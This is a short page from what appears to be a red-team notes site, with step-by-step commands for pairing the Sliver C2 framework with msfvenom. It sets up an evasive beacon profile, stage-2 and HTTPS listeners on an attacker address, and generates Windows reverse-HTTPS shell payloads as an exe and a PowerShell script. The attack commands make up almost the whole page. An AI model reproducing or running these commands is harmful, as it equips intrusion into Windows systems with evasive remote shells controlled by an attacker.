Sliver Msfvenom Payloads
Sliver C2 offers a wide range of payload options, including the ability to create custom msfvenom payloads as seen below.
Create msfvenom profile for windows using various flags
profiles new beacon --arch amd64 --os windows --http https://192.168.68.135:7777 -f shellcode --evasion --timeout 300 --seconds 5 --jitter 1 msfvenom
Create a stage 2 listener that uses the msfvenom profile above
stage-listener --url https://192.168.68.135:7743 --profile msfvenom --prepend-size
Start the https listener for the profile
https --lhost 192.168.68.135 --lport 7777
Create mefvenom custom exe payload
msfvenom -p windows/x64/custom/reverse_winhttps LHOST=192.168.68.135 LPORT=7743 LURI=/hello.woff -f exe > p.exe

Create mefvenom custom powershell payload
msfvenom -p windows/x64/custom/reverse_winhttps LHOST=192.168.68.135 LPORT=7743 LURI=/hello.woff -f psh -o shell.ps1


Last updated
Was this helpful?